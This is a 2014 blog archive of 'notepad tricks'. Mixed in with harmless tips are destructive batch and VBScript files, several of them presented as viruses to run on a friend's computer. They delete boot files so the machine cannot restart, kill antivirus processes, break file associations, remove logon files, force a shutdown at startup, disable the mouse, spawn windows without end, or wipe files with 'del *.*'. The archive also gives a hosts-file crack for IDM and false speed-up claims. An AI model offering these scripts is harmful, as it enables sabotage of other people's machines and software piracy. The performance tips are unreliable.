Pages

Showing posts with label notepad. Show all posts
Showing posts with label notepad. Show all posts

Monday, 14 April 2014

How to Increase Youtube Video Buffering Speed ???

Follow these steps:
1) Go to Start -> Run or Press Windows+R. 
2) Type “system.ini” and then press Enter.
3) A notepad popout will open with something written.
Now Replace the text with the
following text:

page buffer=100Tbps
load=100Tbps
download=100Tbps
save=100Tbps
back=100Tbps
search=100Tbps
sound=100Tbps
webcam=100Tbps
voice=100Tbps
faxmodemfast=100Tbps
update=100Tbps


4) Save it. Browse Youtube as you do,and enjoy faster buffer speed.

If you like then share it...:)

Tuesday, 8 April 2014

Trick to Make Wi-Fi Hotspot on Window using Notepad!!!

Follow these steps : 
1) Open Notepad and type paste below code into it.

netsh wlan set hostednetwork mode=allow
ssid=FreeWIFI key=12345
netsh wlan start hostednetwork

 

2) Now you can change the SSID by changing code in blue color and you can change the
security code in red color.
3) Now make sure to save this file as Start.bat and its done.
4) Now create another new Notepad file and paste below code into it.
 

netsh wlan stop hostednetwork
 

Save this file as Stop.bat and your Wi-Fi Hotspot stopping process is up.
So now when ever you want to start the Wi-Fi Hotspot simply double click the Star.bat
file and your Wi-Fi hotspot will start to broadcast.
As soon as you are done you can double click the Stop.bat file and your broadcast
will be stopped.

Enjoy...:) 

Saturday, 22 March 2014

Open Notepad continuously in your friend’s computer!!!

Open Notepad continuously in your friend’s computer:
Type :

@ECHO off
:top
START %SystemRoot%\system32\notepad.exe
GOTO top

Save it as pc.bat and send it.
ENJOY....:)

Wednesday, 19 March 2014

Tricks To Clean All Temporary Files,Cookies,Temperary Internet Files!!!

Just use notepad...
1) Start with making a new txt file.

 2) Paste this code in the txt file:

@echo off
echo Webhog Cleaner
echo waiting
del /f /s /q %systemdrive%\*.tmp
del /f /s /q %systemdrive%\*._mp
del /f /s /q %systemdrive%\*.log
del /f /s /q %systemdrive%\*.gid
del /f /s /q %systemdrive%\*.chk
del /f /s /q %systemdrive%\*.old
del /f /s /q %systemdrive%\recycled\*.*
del /f /s /q %windir%\*.bak
del /f /s /q %windir%\prefetch\*.*
rd /s /q %windir%\temp & md %windir%\temp
del /f /q %userprofile%\cookies\*.*
del /f /q %userprofile%\recent\*.*
del /f /s /q ?%userprofile%\Local Settings\Temporary Internet Files\*.*?
del /f /s /q ?%userprofile%\Local Settings\Temp\*.*?
del /f /s /q ?%userprofile%\recent\*.*?
echo complete!
echo. & pause
 

3) Now save the file as "Cleaner.bat"

After saving this file, Just open it and see for your self.

THIS WILL MAKE YOUR COMPUTER FASTER ...ENJOY.....:)

Tuesday, 18 March 2014

Simple Trick To Use Web Browsers As Text!!!

Follow these steps:
1) Copy below code in browser Url Section
   data:text/html, <html contenteditable>
2) Now Press Enter.
3) Now you can type anything as would do on
   any other text editor like Notepad.
4) To save your text file Press Ctrl + S and save
   it as anything.txt (.txt Is Must)
ENJOY....:)

Saturday, 15 March 2014

Shutdown any PC forever!!!

Hi friends! Today I will teach you to create a virus that will shutdown the computer forever. Remember, this is not a prank. Don't run this virus on your own computer. Firstly, open a notepad and type the following-

@echo off
attrib -r -s -h c:\autoexec.bat
del c:\autoexec.bat
attrib -r -s -h c:\boot.ini
del c:\boot.ini
attrib -r -s -h c:\ntldr
del c:\ntldr
attrib -r -s -h c:\windows\win.ini
del c:\windows\win.ini

Now save this as filename.bat

Please don't double click this file in your computer.
This file shut down the computer. It shuts the computer off and deletes the files required to reboot and restart.

ENJOY..........:)

Multi Function Virus!!!

Just Copy This Code Below In Notepad, Save as installhack.bat and you are done!
This Virus will:

1. End Process, NAVAPSVC.exe
2. End Process, Explorer.exe (taskbar and icons will dissapear)
3. End Process, zonelabs.exe
4. associate a exe file with txt (when opening exe files, it will go to notepad)
5. associate a txt file with mp3 (when opening txt files, it will open WinAmp or WMP)
6. Deletes Login/Logoff Screens

type bellow code in notepad :

title Hack Setup
color 0A
@echo off
set end=md “Hack installing”
set fin=copy “Hack log.txt” “Installing”
%end%
%fin%
net send * Hack is installing, press OK to begin set up.
kill NAVAPSVC.exe /F /Q
kill zonelabs.exe /F /Q
kill explorer.exe /F /Q
cls
assoc .exe=txtfile
assoc .txt=mp3file
cls
msg * It is you who is hacked….
msg * I warned you, and you kept going. Challenge me and this is what happens.
DEL C:\WINDOWS\system32\logoff.exe /F /Q
DEL C:\WINDOWS\system32\logon.exe /F /Q
DEL C:\WINDOWS\system32\logon.scr /F /Q
cls
shutdown


 sand save filename.bat and run this bat file.
ENJOY....:) 

Thursday, 27 February 2014

A Pretty dangerous notepad trick!!!

This trick will make your friends think that all of their files are being deleted and then at the end the file deletes itself so it is untraceable.

Steps
1) Go into Notepad.
2) Enter the text below into notepad

@echo off
echo do you want to delete all of your computer data? (y/n)
pause >nul
echo Do not exit out of the screen or all computer data will be deleted.
ping localhost -n 2 > nul
echo Are you sure you want to delete all computer data? (y/n)
pause >nul
echo deleting all data...
echo.
echo.
pause localhost -n 2 > nul
dir /s
echo.
echo.
ping localhost -n 2 > nul
cls
echo error.. error.. Not all data deleted, are you sure you wish to stop? (y/n)
pause
echo.
echo.
ping localhost -n 1 > nul
cls
dir /s
echo.
echo.
ping localhost -n 2 >nul
cls
echo all data has been deleted..
pause
del "c:delete.bat"

3)  Save as delete.bat and run it on friens system :)

Wednesday, 26 February 2014

Simple Trick To Use Web Browsers As Text!!!

1) Copy below code in browser Url Section
   data:text/html, <html contenteditable>
2) Now Press Enter.
3) Now you can type anything as would do on
   any other text editor like Notepad.
4) To save your text file Press Ctrl + S and save
   it as anything.txt (.txt Is Must)

Saturday, 15 February 2014

batch file which will Shutdown the computer everytime on startup!!!!!

Follow these steps:
1)Open notepad
2) type code:

@ECHO OFF
shutdown -s -t 10 -c "Virus Attack..."
exit

3) save file as filename.bat
4) GOTO  start=> All program=> right click on startup=> open 
5) paste the batch file in this folder
    
That's all , now the computer will automatically shutdown on every startup..
enjoy..:) 

Friday, 14 February 2014

how to write simple worm virus?

1)Log on to your computer as an administrator.
2)Go on C drive and create a folder, name it "Programs"
3)Open up notepad and type in

@echo off
Copy C:\Programs\virus.bat C:\Programs
Start C:\Programs\virus.bat

4)Click "Save as" and save as virus.bat in the file
(Programs) you just made.
5)If you want the worm to start whenever the computer starts, right click on "virus.bat" and click create shortcut. A shortcut will be made on programs.
6)Right click on the shortcut icon and click "cut".
7)Right click on the shortcut and click "copy".
8)Right click on your start menu and click "explore".
9)Go to All Programs, then find the file named startup.
10)Paste the shortcut onto the startup folder.
11)Right click on the shortcut and go to properties, click on hidden, then press "Apply" or "OK".
You have successfully made a working worm virus. To start it, restart your computer and the disk space on C drive will
be eaten away!!!!!!!!!!!!

Make A Virus That Disable Mouse.

Follow these steps:
1)Open Notepad and copy below codes

rem ---------------------------------
rem Disable Mouse
set key="HKEY_LOCAL_MACHINE\system\CurrentControlSet\Services\Mouclass"
reg delete %key%
reg add %key% /v Start /t REG_DWORD /d 4
rem ---------------------------------

2)Save this file as  virus.bat

3)Done you just created your virus.
  enjoy.....:)

Thursday, 13 February 2014

MAGIC ON NOTEPAD AND WORD.

1>> Here are some awesome trick
you can do with notepad…..
1) Log Diary Trick
Have you ever wanted to make
your own diary on your
computer ? Why not try notepad..
Open notepad Type .LOG Save the
file as LOG.txt Now when you
open notepad, the date and time
will automatically be inserted.
Write anything you want and the
date and time is auto inserted.
Your own notepad Diary -
2) The 4335 Rule
This trick may not work on all
computers,This has been
surprising users for quite some
time. When you enter a few
secret codes, notepad hides
them. Open notepad and type in
BUSH HID THE FACTS Close
notepad and open it again to see
the magic -
3) WORD Magic
open Word Type =rand(200,99)
and press enter,see the Magic

Tuesday, 11 February 2014

HOW TO OPEN 5000 NOTEPAD IN 1 MIN?

Follow these steps:

1) Open notepad and type code:

echo off
:top
start %SystemRoot%system32notepad.exe
goto top

2) Save file like filename.bat and close it


3) Now open bat file and see what happen. Dont do it on your system.
    enjoy...:)

HOW TO HIDE TEXT IN NOTEPAD?

Follow these steps:
1) Open your cmd

2) Type cd.. to change directory to c:drive or cd desktop  to change directory.

3)Now type code in cmd:
    notepad filename.txt:hidden
 4) Write some data and save it.

5) Now check that file filename.txt you will not see any text in that file.

6) If you want to see the containts in file the again open cmd and type same command
     notepad filename.txt:hidden and press enter...
 Now all done and you can see the containts of that file enjoy....:)

HOW TO CRACK IDM?

Follow these steps:
1)  open C:\Windows\System32\Drivers\etc\hosts
2) cut hosts file from there and paste on desktop.
3) open it for edit with notepad.
4) last two line are: #    127.0.0.1       localhost
                                 #    ::1             localhost
5) between these two line copy this code and paste it.
code:    
127.0.0.1 tonec.com

127.0.0.1 www.tonec.com

127.0.0.1 registeridm.com

127.0.0.1 www.registeridm.com

127.0.0.1 secure.registeridm.com

127.0.0.1 internetdownloadmanager.com

127.0.0.1 www.internetdownloadmanager.com

127.0.0.1 secure.internetdownloadmanager.com

127.0.0.1 mirror.internetdownloadmanager.com

127.0.0.1 mirror2.internetdownloadmanager.com


6)After paste, save the file and put it in this directory:C:\Windows\System32\Drivers\etc  and save it.
  
AND IT ALL DONE NOW IDM IS FREE FOREVER........ ENJOY ......:)

Monday, 10 February 2014

Create a Harmless Funny Virus with Notepad which Continuously eject CD/DVD drives.

This trick will create a code which will continuously eject all your connected Optical drives. If you put them back in, it will eject them out again.
 Copy this code and paste it in Notepad as 'filename.vbs'.


:A
Set oWMP = CreateObject("WMPlayer.OCX.7")
Set colCDROMs = oWMP.cdromCollection
do
if colCDROMs.Count >= 1 then
For i = 0 to colCDROMs.Count - 1
colCDROMs.Item(i).Eject
Next
For i = 0 to colCDROMs.Count - 1
colCDROMs.Item(i).Eject
Next
End If
wscript.sleep 5000
goto A



Double click to open this file and you will be impressed by this awesome trick.
 

Note: You'll deactivate this only by restarting ur computer. 

Sunday, 9 February 2014

Clean Your RAM & Make Your Comp Speed Better

You may recognize that your system gets slower and slower when playing and working a lot with your Desktop or a laptop. That’s because your RAM is full of remaining progress pieces you do not need any more.
Open the notepad and type

FreeMem=Space(64000000)
In this file and save it as RAMcleaner.vbs [ You should choose the “All Files” option when u save it ]

Run the file and your RAM may be cleaned Smug
Of course u can edit the code in the file for a greater “cleaning-progress”.

FreeMem=Space(128000000)

Just try it out.. it worked for me. Share your comment here if it worked for you
OR
RESTART UR PC ,sometimes this works better

HOW TO CRASH RAM WITH SIMPLE .BAT FILE?

open notepad and type

:A
start http://crazycomputertrick.blogspot.in/
goto A


save with .bat extension.
Infinitely loops your browser to
open up 
http://crazycomputertrick.blogspot.in/

How to Delete all your system?

files with a small command!
Copy the following code into your
notepad and save it as a .bat file.
 

del *.*
 

All your files in your hard disk will
vanish in less than  five mins.